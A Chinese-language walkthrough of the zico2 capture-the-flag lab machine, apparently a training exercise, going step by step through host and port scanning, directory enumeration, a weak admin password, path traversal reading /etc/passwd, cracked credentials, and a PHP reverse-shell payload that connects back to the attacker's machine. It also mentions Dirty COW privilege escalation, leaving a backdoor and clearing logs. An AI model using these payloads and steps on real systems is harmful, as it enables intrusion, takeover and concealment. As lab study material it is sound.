zico2 靶场从外网到内网渗透

1、主机发现
arp-fingerprint arp-scan
192.168.1.164 00:0c:29:01:73:70 VMware, Inc.
2、端口发现
nmap -P 0-65535 192.168.1.164

PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind

3、目录扫描
dirb http://192.168.1.164

—— Entering directory: http://192.168.1.164/css/ ——
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—— Entering directory: http://192.168.1.164/dbadmin/ ——
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—— Entering directory: http://192.168.1.164/img/ ——
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—— Entering directory: http://192.168.1.164/js/ ——
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

—— Entering directory: http://192.168.1.164/vendor/ ——
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode ‘-w’ if you want to scan it anyway)

4、弱口令
http://192.168.1.164/dbadmin/
admin

5、任意文件读取
http://192.168.1.164/view.php?page=../../../../../etc/passwd

#只截取了部分
root:x:0:0:root:/root:/bin/bash 
daemon:x:1:1:daemon:/usr/sbin:/bin/sh 
bin:x:2:2:bin:/bin:/bin/sh 
sys:x:3:3:sys:/dev:/bin/sh 
sync:x:4:65534:sync:/bin:/bin/sync 
games:x:5:60:games:/usr/games:/bin/sh 
man:x:6:12:man:/var/cache/man:/bin/sh 
lp:x:7:7:lp:/var/spool/lpd:/bin/sh

6、在数据库可写入一句话木马
通过任意文件读取
http://192.168.1.164/view.php?page=../../../../..//usr/databases/test.php

7、数据库中的账号
密码解密出来：
root 34kroot34
zico zico2215@
连接ssh，无法连接。

8、在网站数据库中上传脚本文件获取目标靶机的shell；

创建一个数据库：test；
创建一个表：shell，一个字段信息；
Service apache2 start
在KALI的/var/www/html中添加的shell.txt
<?php $sock=fsockopen(“192.168.1.149”,1234);exec(“/bin/sh -i <&3 >&3 2>&3”);?>
在数据库插入下载shell.txt的的代码，
在Kali上监听1234端口；浏览器通过任意文件读取访问数据库，成功获取目标的shell；

将shell转换为交互式的tty；
python -c’import pty;pty.spawn(“/bin/bash”)’

9、上传脏牛提权

最终获取一个有root权限的firefart用户，root被覆盖替代

10、查看zico，home目录下的wrodpress下的配置文件，找到zico的账号密码

Ssh连接成功

11、留下后门，日志清除